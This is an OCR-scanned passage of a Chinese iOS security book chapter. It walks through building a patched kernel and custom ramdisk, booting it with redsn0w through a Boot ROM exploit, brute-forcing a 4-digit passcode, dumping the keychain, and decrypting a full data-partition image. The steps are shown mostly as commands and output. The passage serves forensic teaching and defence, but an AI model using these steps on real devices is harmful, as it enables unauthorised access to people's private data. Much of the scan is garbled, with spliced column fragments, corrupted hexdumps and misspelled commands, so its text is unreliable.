现在 ， 我 们 需要 从 img3fs/ 子 目录 构建 [MG3 FUSE 文 件 系 统 了 。 该 FUSE 文 件 系统 模块 让 大 家 
可 以 直接 挂 接 iOS 固 件 包 (IPSW ) 中 包含 的 固件 盘 镜 像 。ramdisk 的 build 脚 本 会 利用 这 些 镜像 修 
改 所 含 的 ramdisk， 而 这 些 ramdisk 通 常 是 在 移动 设备 上 安装 新 版 OS 时 使 用 的 。 


$ cd iphone-dataprotection 

$s make -C img3fs 

gcc -o img3fs img3fs.c -Wall -lfuse ino64 -lcrypto -I/usr/local/include/ 
osxfuse || gcc -o img3fs img3fs.c -Wall -losxfuse_i64 -lcrypto 
-I/usr/local/include/osxfuse 


区 

至 此 ， 大 家 还 应 该 下 载 由 iPhone Dev Team 开 发 的 OS 越狱 实用 工具 redsn0ow。redsn0w 应 用 
包含 一 个 plist 文 件 ， 该 文件 含有 已 经 发 布 的 所 有 iOS 固 件 镜像 的 解密 密 钥 ，build 脚 本 会 使 用 它 自 
动 解密 内 核 和 ramdisk。 不 久之 后 ， 大 家 还 会 使 用 redsn0w3 引 导 自 定义 的 ramdisk。 你 应 该 按照 如 
下 方式 下 载 redsn0w， 并 创建 指向 其 Keys.plist 文 件 的 符号 链接 。 


$ curl -LO https://sites.google.com/a/iphone-dev.com/files/home/\ 
redsn0w mac 0.9.10b5.zip 
% Total % Received % Xferd Average Speed Time Time Time Current 
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Dload Upload Total Spent Left Speed 

100 14.8M 100 14.8M 0 0 1375k 0 0:00:11 0:00:11 --:--:-- 1606k 
$ unzip redsnow mac 0.9.10b5.zip 
Archive: redsn0w _ mac _ 0.9.10b5.zip 

creating: fedqsnow mac 0.9.10b5/ 

inflating: redsnow mac_0.9.10b5/boot-ipt4g.commangd 

inflating: redsn0w mac 0.9.10b5/credits.txt 

inflating: redqsnow mac 0.9.10b5/license.txt 

inflating: redsnO0w_ mac_0.9.10b5/README .txt 

creating: redsn0w mac_ 0.9.10b5/redqsnow.app/ 

creating: redsn0w_ mac_0.9.10b5/redsn0w.app/Contents/ 

inflating: redsn0w_ mac 0.9.10b5/redsn0w.app/Contents/Info.plist 

creating: redsn0w mac_0.9.10b5/redsn0w.app/Contents/MacOs/ 

inflating: redsn0w mac_0.9.10b5/redsn0w.app/Contents/MacOS/bn.tar.gz 

inflating: redsn0w mac 0.9.10b5/redsn0w.app/Contents/MacOS/bootlogo.png 

inflating: redqsnow mac 0.9.10b5/redsnO0w.app/Contents/MacOS/bootlogox2 .png 

inflating: redsn0w mac 0.9.10b5/redsnO0w.app/Contents/MacOS/Cydia.tar.gz 

inflating: redqsnow mac 0.9.10b5/redsnO0w.app/Contents/MacOS/Keys.plist 

inflating: redsn0w mac_ 0.9.10b5/redsn0w.app/Contents/MacOS/progresslogo.png 

inflating: redsn0w mac 0.9.10b5/redsn0w.app/Contents/MacOS/rd.tar 

inflating: redqsnow mac 0.9.10b5/redsn0w.app/Contents/MacOS/redsn0w 
extracting: redqsnow mac_0.9.10b5/redsnO0w.app/Contents/PkgInfo 

creating: redsn0w mac_0.9.10b5/redsn0w.app/Contents/Resources/ 

inflating: redqsnow mac 0.9.10b5/redsn0w.app/Contents/Resources/redsn0w.icns 
$ ln -s redsn0w mac 0.9.10b5/redsn0w.app/Contents/MacOS/Keys.plist . 


现在 我 们 需要 用 到 iOS 固 件 更 新 软件 存档 (IPSW )， 将 其 作为 该 取证 ramdisk 的 模板 。 为 获得 
最 佳 结果 ， 请 使 用 iOS 5 的 最 新 版 本 。 自 定义 的 ramdisk 是 向 后 兼容 的 ， 也 可 以 用 于 安装 了 更 早 版 
本 iOS 4 或 iOS 5 的 设备 。 如 果 要 在 用 于 为 :OS 设备 升级 固件 的 机 器 上 创建 该 ramdisk， 就 要 事先 下 
载 IPSW 并 将 其 存储 在 主 目 录 下 。 不 然 ， 你 就 要 在 redsn0w 的 Keys.plist 文 件 中 查找 每 一 个 已 知 
IPSW 的 URL。 我 们 要 确保 自己 使 用 的 是 与 所 用 硬件 型 号 相对 应 的 IPSW。 应 该 将 相应 的 IPSW 复 秆 
到 当前 目录 中 ， 如 以 下 代码 所 示 ( 这 里 所 示 的 命令 假设 大 家 是 在 为 iPod Touch 4G 创 建 取证 
ramdisk )。 该 IPSW 的 文件 名 中 就 含有 硬件 型 号 的 名 称 (Pod 4,1 ), iOS 版 本 号 (5.0 ) 和 具体 的 build 
号 (9A334 )。 











\DDNNONNDNDNONO \O \O \O \O NO \0O 






































二 























$ cp ~/Library/MobileDevice/Software\ Images/iPod4,1 5.0 9A334 Restore.ipsw . 


为 了 让 该 ramdisk 正 常 工作 ,必须 用 修改 过 的 内 核 i 运行 它 巴 。kernel_patcher .py 脚本 会 为 从 
osmffagifmsw 人 人 Renawaietr-- 和 ， 让 它 运 行 在 越狱 状态 下 。 这 样 做 禁用 了 代 

签名 , 使 内 核 可 以 运行 任意 二 进 制 文件 。 除 此 之 外 ， 打 过 补 了 的 内 核 会 允许 那些 通常 不 许 执行 
中 了 为。 例如， 在 打上 IOAESAccelerator 内 核 扩展 补丁 之 后 ， 我 们 就 可 以 使 用 UID 密 钥 加 密 或 解 
密 数 据 ， 而 一 般 情况 下 在 内 核 完 成 引导 后 是 不 允许 这 样 做 的 。 你 应 该 在 自己 的 IPSW 上 运行 
kernel _ patcher.py 脚 本， 创建 打 过 补丁 的 kernelcache 和 用 来 创建 自 定 义 ramdisk 的 shell 脚 本 。 
请 注意 所 创建 脚本 的 文件 名 ， 因 为 根据 iOS 设 备 硬件 型 号 的 不 同 ， 这 些 文件 名 是 不 同 的 。 

$ python python scripts/kernel patcher.py iPod4,1 5.0 9A334 Restore.ipsw 


Decrypting kernelcache.release.n81 
Unpacking ... 
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Doing CSED patch 

Doing getxattr system patch 

Doing _PE i can has_debugger patch 
Doing IOAESAccelerator enable UID patch 
Doing AMFI patch 


E 








Patched kernel written to kernelcache.release.n81.patched 


Created script make ramdisk n8lap.sh, you 


can use it to (re)build the ramdisk 


kernel_patcher. py 脚本 会 创建 名 为 nake_ramdisk_n81ap.sh 的 脚本 ， 用 它 来 创建 自 定 








四 
个 














义 ramdisk。 如 果 你 使 用 的 是 用 于 其 他 型 号 iOS 设 备 自 
我 们 应 该 运行 该 脚本 ， 创 建 取证 ramdisk: 


行 该 
$ sh make ramdisk n8lap.sh 
Found iO0OS SDK 5.0 
[Lysl 
Downloading ssh.tar.gz from googlecode 
多 Total %$ Received % 


Ee Ee Ee 





100 3022k 0 0 1670k 
iPod4,1 5.0_9A334_Restore.ipsw 
018-7923-347 .dmg 
ET 14 data_ length:4 
ET 34 data_ length:104b000 
TAG: SEPO OFFSET 104b040 data_ length:4 
[TAG: KBAG OFFSET 104b05c data_ length:38 
cryptState=1 aesType=100 
: KBAG OFFSET 104b0a8 data_ length:38 

SHSH OFFSET 104bl0c data_ length:80 
TAG: CERT OFFSET 104b198 data_ length:794 
Decrypting DATA section 
Decrypted data seems OK : 
/dev/diskl1 
"diskl" unmounted. 
"diskl" ejected. 
myramdisk.dmg created 
You can boot the ramdisk using the follow 
redsn0w -i iPod4,1 5.0_9A334_ Restore.ipsw 

-k kernelcache.release.n81 .patched 


100 3022k 
Archive: 

inflating: 
TAG: TYPE OFFSI 
TAG: DATA OFFSI 


FE 











六 











ramdisk 


Xferd Average Speed 
Dload Upload 


JIPSW, 脚本 的 名 称 可 能 会 有 些许 不 同 。 现 在 ， 


Time Time Time 
Total Spent Left 


0 0:00:01 0:00:01 --:--:-- 


/Volumes/ramdisk 


ing command (fi x paths) 
-r myramdisk.dmg \ 


在 下 一 节 中 ， 我 们 会 使 用 redsnow 引 导 刚 刚 创 建 的 自 定义 ramdisk。 


3. 引导 ramdisk 


现在 ,我们 可 以 使 用 redsnow 引 导 自 定义 ramdisk 了 。 我 们 要 从 命令 行 运行 edsn0ow， 并 指 
定 到 IPSW 、ramdisk 和 打 过 补丁 的 内 核 的 完全 路 径 。 


$ ./redsn0w mac 0.9.10b5/redsn0w.app/Cont 
iPod4,1 5.0_ 9A334 Restore.ipsw -r myramdi 
-k kernelcache.release.n81 .patched 


在 用 以 上 命令 运行 redsn0w 时 ， 它 会 跳 过 平常 


ents/MacOS/redsn0w -i 
sk.dmg \ 


指令 


的 开机 画面 ， 并 立即 显示 如 图 3-2 所 示 的 指令 。 





在 这 里 , 大 家 应 该 确保 上 日 标 iOS 设 备 通过 USB 接 口 连 


接 到 运行 着 redsn0w 的 计算 机 上 。 如 果 知 道 如 


何 把 设备 置 为 DFU 模 式 ， 现 在 你 就 可 以 动手 了 ; redsn0w 会 对 此 进行 检测 并 自动 引导 该 ramdisk。 
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图 3-2 如 果 需 要 了 解 如 何 将 设备 置 为 DFU 模 式 ， 请 点 击 Next 按 钮 ， 
让 zedsn0w 一 步 步 引导 你 完成 这 一 过 程 

一 旦 设备 处 于 DFU 模 式 ，redsn0w 就 会 继续 利用 Boot ROM 中 的 一 个 已 知 漏洞 ， 并 注入 它 自 
己 的 原始 机 器 码 有 效 载荷 。 这 些 有 效 载荷 会 禁用 随后 引导 阶段 的 签名 验证 ,并 人 允许 使 用 未 签名 或 
未 正确 签名 的 内 核 和 ramdisk 引 导 系 统 。 这 只 是 暂时 越狱 设备 ， 让 iPhone Data Protection Tools 引 导 
自 定义 ramdisk， 并 用 它 从 目标 设备 获取 数据 。 

该 自 定义 ramdisk 包 含 了 SSH 服 务 器 , 用 于 对 设备 的 远程 命令 行 访问 。 要 连接 到 该 SSH 服 务 器 ， 
你 需要 借助 USB 协 议 代理 的 网 络 连 接 。 苹 果 的 MobileDevice 框 架 (Mac OSX 自 带 ， 而 且 可 以 通过 
Windows 版 的 iTunes 安 装 ) 含有 usbmuxgd 后 台 守 护 进 程 。 该 守护 进程 管理 着 本 机 软件 对 iOS 设 备 
USB 协 议 的 访问 ,该 协议 的 一 个 功能 是 在 USB 协 议和 本 地 侦 听 iOS 设 备 的 TCP 套 接 字 之 间 建 立 TCP 
套 接 字 连接 。iTunes 会 利用 这 一 点 实现 多 种 功能 ， 不 过 这 一 功能 还 可 以 用 来 连接 到 越狱 或 暂时 越 
狱 的 OS 设备 上 运行 的 自 定义 软件 。 在 这 里 ,我 们 要 利用 该 功能 ,通过 运行 名 为 Lcprelay .sh 的 
shell 脚 本 连接 取证 ramdisk 上 运行 的 SSH 服 务 器 。 


$ sh tcprelay.sh 

Forwarding local port 2222 to remote port 22 
Forwarding local port 1999 to remote port 1999 
Lb sa 


所 包含 的 很 多 Python 脚本 都 要 依赖 通 过 SSH 访 问 目标 设备 的 能 力 , 所 以 在 从 设备 获取 数据 时 ， 
你 要 在 另 一 个 终端 选项 卡 或 窗口 中 保持 tcprelay. sh 处 于 运行 状态 。 

4. 对 4 位 数字 密码 进行 蛮 力 攻击 

要 解密 keychain 或 文件 系统 中 受 保护 的 项 ， 我 们 就 需要 恢复 并 解密 系统 keybag。 如 果 示 设置 
密码 ， 那 么 keybag 很 容易 解密 。 如 果 用 户 设置 了 简单 的 4 位 数字 密码 ， 就 需要 猜 解 密码 了 。 工 具 
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包 中 名 为 demo_bruteforce. py 的 Python 脚本 可 以 执行 这 一 攻击 ,并 在 20 分 钟 左右 的 时 间 内 猜 解 
任何 4 位 数字 密码 。 只 有 在 通过 SSH 和 连接 到 ioS 设 备 的 电脑 上 运行 该 脚本 ， 并 解密 系统 keybag 后 ， 
我 们 才 可 以 转 储 keychain。 


$ python python scripts/demo bruteforce.py 

Device UDID : e8a27a5eeleacdcb29edq683186ef5b2393c59e5a 

Keybag: SIGN check OK 

Keybag UUID : 11d1928f9alf491fb87fb9991blc3ec6 

Saving /Users/admin/Desktop/iphonedataprotection/ 

e8a27a5eeleacdcb29ed683186ef5b2393c59e5a/9dd7912fb6f996e9.plist 

passcodeKeyboardComplexity : {'rangeMinimum': 0, 'value': 0， 
'rangeMaximum': 2} 

Trying all 4-digits passcodes... 

BruteforceSystemKeyBag : 0:03:41.735334 














{'Ppasscode': '1234', 'passcodeKey': 
'497ea264862390ccl3a9eebc118f7ec65c80192787c6b3259b88c62331572ed4'} 
True 


Keybag type : System keybag (0) 
Keybag version : 3 
Class WRAP Type Key 
1 3 0 
f2680d6bcdde71lalfaelc3a538e7bbe0f0495e7f75831959f10a41497675f490 
2 3 1 
01133605e634ecfa168a3371351f36297e2ce599768204fdq5073f8c9534c2472 
3 3 0 
cbd0a8627ad1l5b025a0ble3e804cc61df85844cadb01720a2f282ce268e9922e 
5 3 0 
75a657a13941c98804cb43e395a8aebe92e345eaa9bc93dbe1563465b118e191 
6 0 
e0e4e1396f7eb7122877e7c307c65221029721f1d99f855c92b4cd2ed5a9adb1 
7 3 0 
a40677ed8dff8837c077496b7058991cc1200e8e04576b60505baff90c77be30 
8 下 0 
2d058bf0800a12470f65004fecaefaf86fbdfdb3d23a4c900897917697173f4c 
9 3 0 
98640c771d020cc1756c73ae87e686e5c170f794987d217eeca1616d0e9028d 
10 3 0 
661a4670023b754853aa059a79d60dbb77fc3e3711le5albd890f218c33e7f64c 
Tl 1 0 
669964beb0195dfa7207f6a976bf6849c0886del2bea73461e93fa274ff196a4 


Saving /Users/admin/Desktop/iphone-dataprotection/ 
e8a27a5eeleacdcb29ed683186ef5b2393c59e5a/9dd7912fb6f996e9.plist 
Downloaded keychain database, use keychain tool.py to decrypt secrets 


如 果 未 设置 密码 或 者 猜 解 出 了 密码 ， 系 统 keybag 和 keychain 数 据 库 就 会 被 下 载 到 以 目标 设备 
UDID 命 名 的 目录 。 

5. 转 储 keychain 

现在 我 们 已 经 恢复 了 系统 keybag 和 备份 的 keychain ， 接 着 可 以 使 用 kevchain_tool .py 脚本 
解密 keychain 了 。 该 脚本 具有 若干 个 选项 ， 并 且 要 求 keychain 备 份 和 系统 keybag 的 路 径 与 
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demo_bruteforce.py 保 存 它 们 的 路 径 一 致 。 例如 , -a 和 -s 选 项 的 作用 是 转 储 keychain 条 目 并 用 
星 号 隐 去 密码 的 部 分 内 容 。 下 面 展示 了 运行 该 脚本 的 输出 示例 : 


$ python python scripts/keychain tool.py \ 
-ds e8a27a5eeleacdcb29ed683186ef5b2393c59e5a/keychain-2.db \ 
e8a27a5eeleacdcb29ed683186ef5b2393c59e5a/9dd7912fb6f996e9.plist 
Keybag: SIGN check OK 
Keybag unlocked with passcode key 
Keychain version : 5 





Passwords 
Service : AirPort 
Account : MyHomeNetwork 
Password : | 
Agrp : apple 
Service : com.apple.managedconfiguration 
Account : Private 
Password : <binary plist data> 
Agrp : apple 
Service : com.apple.certui 
Account : https: simba.local - 446c9ccd 6ef09252 f3b4e55d 4df16dd3 [...] 
Password : <binary plist data> 


Agrp : com.apple.cfnetwork 


Service : com.apple.certui 
Account : https: simba.local - 46cl4e20 b83a2cef 86340d38 0720f560 [...] 
Password : <binary plist data> 


Agrp : com.apple.cfnetwork 


Service : push.apple.com 
Account 
Password : << 世 大大 炎炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 火炎 炎炎 大大 大 


Agrp : com.apple.apsd 





Service : com.apple.managedconfiguration .mdm 
Account : EscrowSecret 
Password i 二 国米 火炎 火炎 火炎 火炎 火炎 火炎 炎炎 炎炎 炎炎 炎炎 炎炎 类 类 类 类 类 炎炎 类 类 类 





Agrp : apple 


D62C2C53-A41E-4E2C-92EE-C516D7DCDE30_apple 

Device Management Identity Certifi cate com.apple.identities 
E60AC2D7-D1IDE-4A98-92A8-1945A09B3FA2_com.apple.apsd 
E60AC2D7-D1DE-4A98-92A8-1945A09B3FA2_lockdown-identities 
com.apple.ubiquity.peer-uuid.68C408A0-11BD-437E-A6B7- 
A6A2955A2F28_[...] 

iOS Hackers Inc._ com.apple.certificates 

iPhone Configuration Utility (6506EBB9-3A1A-42A2-B3ED-8CDA5213EEB2 ) 
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Private keys 
D62C2C53-A41E-4E2C-92EE-C516D7DCDE30_apple 

Device Management Identity Certificate com.apple.identities 
E60AC2D7-D1IDE-4A98-92A8-1945A09B3FA2_com.apple.apsd 
E60AC2D7-D1DE-4A98-92A8-1945A09B3FA2_lockdown-identities 
com.apple.ubiquity.peer-uuid.68C408A0-11BD-437E-A6B7-A6A2955A2F28.[...] 


























6. 转 储 数据 分 区 
为 了 进行 全 面 的 取证 分 析 , 我 们 应 该 转 储 整个 数据 分 区 。 该 分 区 中 包含 了 设备 上 安装 的 全 部 











应 用 及 用 户 数据 。 未 越狱 的 OS 设备 的 系统 分 区 是 只 读 的 ， 而 且 不 含 任何 有 用 的 数据 。 





按照 如 下 方式 运行 名 为 qump_qdata_partition.sh 的 shell 脚 本 ,我们 就 可 以 得 到 数据 分 区 


的 磁盘 镜像 。 


$s sh dump data partition.sh 

Warning: Permanently added '[localhost]:2222' (RSA) to the list of known 
hosts. 

root@localhost's password: 

Device UDID : e8a27a5eeleacdcb29edq683186ef5b2393c59e5a 

Dumping data partition in e8a27a5eeleacdcb29edq683186ef5b2393c59e5a/ 
data_20120222-1450.dmg ... 

Warning: Permanently added '[localhost]:2222' (RSA) to the list of known 
hosts. 

root@localhost's password: 

dd: opening ‘/dev/rdisk0s2s1': No such file or directory 

836428+0 records in 

836428+0 records out 

6852018176 bytes (6.9 GB) copied, 1024.08 s, 6.7 MB/s 


原始 的 HFS 文 件 系统 会 用 Mac OS X 可 以 直接 挂 接 的 格式 转 储 。 如 果 双 击 该 DMG 文 件 ， 它 就 











会 被 自动 挂 接 。 记 住 ， 以 读 - 写 模式 挂 接 该 DMG 文 件 是 允许 进行 修改 的 ， 并 会 破坏 所 获得 镜像 的 
取证 完整 性 。 大 家 可 以 用 haiuti1 命 令 以 只 读 模 式 挂 接 该 磁盘 镜像 。 


$ hdiutil attach \ 
-readonly e8a27a5eeleacdcb29ed683186ef5b2393c59e5a/data 20120222-1450 .dmg 
/dev/disk6 /Volumes/Data 


hdiutil 命 令 的 输出 表示 该 磁盘 镜像 已 被 附加 到 设备 文件 /dev/disk6 并 挂 接 在 /Volumes/Data 
现在 我 们 就 可 以 在 /Volumes/Data/ 中 浏览 该 文件 系统 ， 并 会 发 现 所 有 文件 内 容 都 已 被 加 密 。 


$ cd /Volumes/Data/ 








$s 1s 

Keychains/ folders/ root/ 
Managed Preferences/ keybags/ run/ 
MobileDevice/ log/ spool/ 
MobileSoftwareUpdate/ logs/ tmp/ 

db/ mobile/ vm/ 

ea/ msgs/ wireless/ 
empty/ preferences/ 


$ file mobile/Library/SMS/sms .db 
mobile/Library/SMS/sms.db: data 
$ hexdump -C mobile/Library/SMS/sms.db | head 
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00000000 09 7a b1 ‘05. 48. bl bb 6d 65. 02 leéed3 50 67 ga 3e |.}..H..me....Pg.> 
00000010 66 99 eb 3¢ 9 下 41 fa C7 91 ce4 10 这 6 b2 2£ 21 b2 | <As iss I 
00000020 39 87 12 39 6d 5c 96 7d 4a bd al 4a ea 49 ba 40 |9..9m\.}J..J.I.@ 
00000030 96 53 .c4 ‘d3 81 ‘0d 6e 73 98 :be 91 11 .db e0 €&2 3d |S ns va. = 
00000040 7a 17 82 35 18 59 fb 17 ‘la b2 51 89 fc 8b: 55 5a-|15225.Y. .QU02 








00000050 95 04 a0 4d6 2d d5 6a 6c e8 ad 65 df ea b4 a8 8b |....-.jl..e..... 
00000060 7e de cl d2 b2 8a 30 e9 84 bb 08 9a 58 9a ad ba |~..... Qn bE 
00000070 bb ba bl 9e 2a 95 67 d7 be al 4b a7 de 41 05 56 |....*.g9...K..A.V 
00000080 d5 4e 8b d6 3b 57 45 d2 76 4e 67 c0 8b 10 45 d9 |.N..;WE.vNg...E 

00000090 yb 2a ee3 ¢9 11 £4 G5 £0 56 84 86 by 46 fe 56 .88 |{* ,so . Ve nade Vs 











当 iOS 磁 盘 镜 像 挂 接 到 Mac OS X 上 时 ， 我 们 就 能 浏览 该 文件 系统 并 查看 所 有 的 文件 元 数据 
Ts 但 所 有 文件 内 容 都 是 无 法 辨识 的 已 加 密 数 据 。 为 即便 保护 等 级 为 NSFi leProtectionNone 
的 文件 也 是 加 密 过 的 。 要 查看 文件 数据 ， 我 们 必须 用 系统 keybag 中 的 密 钥 解密 文件 的 内 容 。 在 之 
前 的 命令 中 ，sms.db 文 件 是 不 可 辨识 的 数据 ， 即 便 它 的 保护 等 级 是 NSsFileProtectionNone。 
7. 解密 数据 分 区 
要 解密 文件 数据 ， 我 们 就 要 用 到 iPhone Data Protection Tools 中 的 emf_qdecrypter .py 脚本 。 
该 脚本 会 使 用 数据 分 区 的 原始 镜像 和 解密 过 的 系统 keybag 解 密 文 件 系 统 中 所 有 加 密 过 的 文件 。 
为 这 要 求 访问 keybag ,所 以 请 确保 已 经 运行 aemo_bruteforce.py 猜 解 了 用 户 密码 并 解密 了 系统 
keybag。 大 家 应 该 运行 这 里 所 示 的 emf_decrypter .py 脚本 。( 注意 , 目录 和 文件 名 很 可 能 不 同 ， 
因为 它们 以 目标 设备 的 唯一 特征 为 依据 。 ) 
$ python python scripts/emf decrypter.py \ 
e8a27a5eeleacdcb29ed683186ef5b2393c59e5a/data 20120222-1450.dmg \ 
e8a27a5eeleacdcb29ed683186ef5b2393c59e5a/9dd7912fb6f996e9.plist 
Keybag: SIGN check OK 
Keybag unlocked with passcode key 
cprotect version : 4 
WARNING ! This tool will modify the hfs image and possibly wreck it if 
something goes wrong |! 
Make sure to backup the image before proceeding 


You can use the --nowrite option to do a dry run instead 
Press a key to continue or CTRL-C to abort 






































Decrypting TrustStore.sqlite3 
Decrypting keychain-2.db 

Ls 

Decrypted 398 files 

Failed to unwrap keys for : [] 
Not encrypted files : 19 


如 果 未 出 现 错误 , 该 脚本 应 该 会 直接 修改 磁盘 镜像 , 这 样 一 来 所 有 文件 的 内 容 都 已 经 解密 并 
可 以 辨识 了 。 要 验证 这 一 点 , 我 们 可 以 再 次 挂 接 该 磁盘 镜像 , 并 查看 之 前 无 法 辨识 的 SMS 数 据 库 : 


$ hdiutil attach -readonly \ 
e8a27a5eeleacdcb29ed683186ef5b2393c59e5a/data 20120222-1450 .dmg 

/dev/disk6 /Volumes/Data 

$ cd /Volumes/Data/ 

$ file mobile/Library/SMS/sms.db 

mobile/Library/SMS/sms.db: SQLite 3.x database 
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$ hexdump -C mobile/Library/SMS/sms.db | head 

00000000 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 |sQLite format 3. 
00000010 10 00 02 02 00 40 20 20 00 00 00 02 00 00 00 01 |..... Ge | 
QDDU020 D0 UD V0 0 D0 VV O00 V0 D0 OV 0 VD DO OV O00 DD [ov reiesy 
U0000030 98 00. 00 G0 0 00 00 01. 00. 900. 00 00 00 00 00 0 [各 训 各 训 各 生计 证 各 训 和 
00000040 O00 00.00 G0 0 0.80 O00 0 0. 00 G0 0 00.00 G0 smi 
Qo00000s0. 00 00. 0:0" ;00° :0:0: .0:0 :0:0: 0 
00000060 00 2d e2 1f 0d 00 00 00 00 10 00 00 00 00 00 00 |.-.............. 
O000070 00 00. 0 00 D0 O00 0 00 90 .00 00 90 000 0 00 | sve 


00001000 

现在 我 们 应 该 能 彻底 查看 数据 分 区 中 的 数据 了 。 这 说 明 ， 如 果 用 户 只 使 用 4 位 数字 密码 或 者 
根本 不 使 用 密码 ，iOS 设 备 上 的 所 有 数据 是 很 容易 恢复 的 。 若 用 户 选 用 强 密码 ， 那 么 只 有 保护 等 
级 为 NSFilLleProtectionNone 的 文件 和 保护 等 级 为 kSecAttrAccessibleAlways 的 keychain 
项 是 可 以 访问 的 。 对 于 攻击 者 来 说 ， 好 消息 就 是 设备 上 绝 大 多 数 文件 和 keychain 项 的 保护 等 级 都 
是 如 此 ， 因 为 很 少 有 iOS 应 用 ( 即便 是 系统 内 置 的 应 用 ) 会 使 用 Data Protection API。 

请 务必 记 住 , 这 些 攻 击 在 对 目标 设备 的 短暂 访问 中 即 可 完成 。 例 如 ,获得 8 GB 数据 分 区 的 完 
整 取证 镜像 并 蛮 力 破解 4 位 数字 密码 大 概 只 需要 半 小 时 的 时 间 。 即 便 是 密码 未 被 猜 解 ， 攻 击 者 也 
可 以 从 设备 中 读 取 大 量 数据 ( 包括 照片 、 短 信和 第 三 方 应 用 数据 )， 因 为 它们 使 用 了 NSFile- 
ProtectionNone 级 别 的 密 钥 加密 ， 并 未 受到 密码 密 钥 的 保护 。 在 iOS 内 置 的 应 用 中 ， 只 有 邮件 
应 用 利用 Data Protection API 保 护 数 据 〈 用 户 的 电子 邮件 消息 及 附件 )。 评估 第 三 方 应 用 存储 用 户 
信息 的 安全 程度 需要 有 技术 熟练 的 移动 安全 应 用 审核 师 ， 而 应 用 的 开发 者 很 少 能 得 到 这 些 信 息 。 
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3.3 小结 





iOS 中 为 用 户 数 据 加 密 的 主要 设施 就 是 Data Protection API。iOS 4 引入 的 Data Protection API 
让 应 用 可 以 声明 哪些 文件 和 keychain 项 是 敏感 的 , 以 及 它们 何 时 可 供 使 用 。 这 使 OS 操作 系统 可 以 
自动 地 全 面 控 制 这 些 数据 的 加 密 和 解密 。 受 到 Data Protection API 保 护 的 数据 是 经 过 加 密 的 , 用 到 
了 由 设备 唯一 的 AES 密 钥 得 到 的 密 钥 , 还 可 以 利用 用 户 的 密码 ,这样 一 来 ,攻击 者 如 果 想 解密 数 
据 ， 就 一 定 要 实际 接触 设备 并 且 知 道 或 猜 解 用 户 的 密码 。 

针对 数据 保护 的 攻击 利用 了 两 点 事实 ， 一 是 默认 情况 下 简单 的 4 位 数字 密码 很 容易 用 蛮 力 攻击 
破解 ， 二 是 iOS 存 储 的 大 部 分 数据 现在 都 没有 受到 Data Protection API 的 保护 。 特 别 要 指出 的 是 ,在 
iOS 系 统 内 置 的 应 用 中 ， 目 前 只 有 邮件 应 用 使 用 了 Data Protection API 保 护 其 数据 。 攻 击 者 可 以 为 捕 
获 的 设备 越狱 ,并 在 上 面 安 装 自 定义 工具 蛮 力 破解 设备 所 有 者 的 密码 。 攻 击 者 还 可 以 引导 自 定义 
ramdisk 执 行 同样 的 攻击 。 正 如 开源 工具 iPhone Data Protection Tools 所 展示 的 ， 引 导 自 定义 ramdisk 也 
有 利于 完整 地 获取 取证 数据 。 除 此 之 外 ， 因 为 OS 在 重启 后 会 保留 应 用 状态 ， 所 以 用 户 可 能 不 会 注 
意 到 他 们 的 手机 已 经 重启 并 被 自 定义 ramdisk 攻 击 过 ,但 其 实 他 们 的 手机 被 攻击 者 短暂 控制 过 。 

这 些 针 对 数据 保护 的 攻击 表明 , 应 用 开发 者 充分 使 用 Data Protection API 保 护 敏 感 信 息 , 以 及 
企业 强制 要 求 存 放 或 处 理 敏感 信息 的 OS 设备 使 用 强 密码 ， 是 十 分 重要 的 。 
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当 苹 果 公 司 2008 年 发 布 iOS 2.0 时 ， 它 就 启动 了 一 项 计划 ， 旨 在 严格 控制 可 在 iOS 设 备 上 执行 
的 代码 。 这 是 通过 Mandatory Code Signing (强制 代码 签名 ) 实现 的 。 得 到 许可 的 组 织 必须 为 每 一 
个 要 在 iOS 设 备 上 运行 的 应 用 签名 。 如 果 代 码 未 签名 ， 内 核 中 的 检查 就 不 会 允许 这 些 代 码 在 设备 
上 执行 。 不 管 是 设备 出 厂 时 预 装 的 应 用 , 还 是 从 App Store 下 载 安 装 的 应 用 ,都 要 经 过 苹果 公司 私 
钥 的 签名 。 除 此 之 外 , 企业 、 大 学 和 独立 开发 者 可 以 对 设备 进行 特殊 设置 ， 让 它们 认可 其 他 组 织 
的 签名 。 不 过 ， 强 制 代码 签名 不 只 是 会 影响 二 进 制 文件 ， 而 且 会 影响 到 所 有 代码 ， 包 括 库 文件 ， 
其 至 是 内 存 中 的 可 执行 代码 。 这 一 规则 的 唯一 例外 就 是 Web 浏 览 器 MobileSafari 的 即时 ( Just In 
Time ) 编译 。 

代码 签名 机 制 对 于 iOS 的 安全 而 言 有 两 大 重要 作用 。 其 一 ， 它 使 恶意 软件 很 难 进入 iOS 设 备 。 
在 iOS 设 备 上 运行 代码 的 唯一 途径 就 是 从 苹果 的 App Store 上 获取 代码 ( 除非 设备 经 过 特殊 配置 )。 
对 所 有 要 发 布 到 App Store 上 的 应 用 而 言 ,在 发 布 之 前 都 要 接受 苹果 公司 的 审查 , 以 确保 不 含 恶意 。 
与 之 相反 ,使 用 安 卓 系统 的 设备 可 以 运行 任何 自 签名 过 的 应 用 ,其 用 户 可 以 下 载 和 运行 任何 文件 ， 
就 像 PC 机 那样 。 相 对 于 iOS ， 恶 意 软 件 对 安 卓 系统 而 言 是 种 更 现实 的 威胁 。 

代码 签名 的 另 一 个 重要 作用 则 体现 在 防御 漏洞 攻击 ， 或 者 说 是 下 载 驱动 攻击 上 。 与 微软 的 
DEP ( Data Execution Prevention ， 数 据 执行 保护 ) 技术 非常 相似 ， 代 码 签名 机 制 可 以 防止 代码 
( shellcode ) 被 注入 到 受 影响 的 进程 中 执行 。 不 过 ,强制 代码 签名 比 DEP 更 强 。 为 绕 过 这 些 内 存 保 
护 机 制 ， 攻 击 者 通常 会 使 用 ROP( Return Oriented Programming， 面 向 返回 的 程序 设计 )。 要 对 付 
带 有 DEP 或 类 似 保护 机 制 的 系统 ， 攻 击 者 只 需要 执行 足够 长 的 ROP 禁 用 DEP， 然 后 执行 本 机 代码 
有 效 载荷 。 不 过 ， 在 i0S 中 ， 攻 击 者 是 不 可 能 关闭 强制 代码 签名 的 ， 而 且 因 为 本 机 代码 有 效 载荷 
是 未 签名 的 ， 所 以 它 不 可 能 运行 。 因 此 ， 整 个 iOS 有 效 载荷 都 一 定 是 在 ROP 中 执行 的 ， 这 要 比 针 
对 DEP 的 模拟 攻击 难 很 多 。 此 外 ,该 有 效 载 荷 不 能 只 写 人 包含 恶意 软件 的 新 可 执行 文件 (攻击 者 
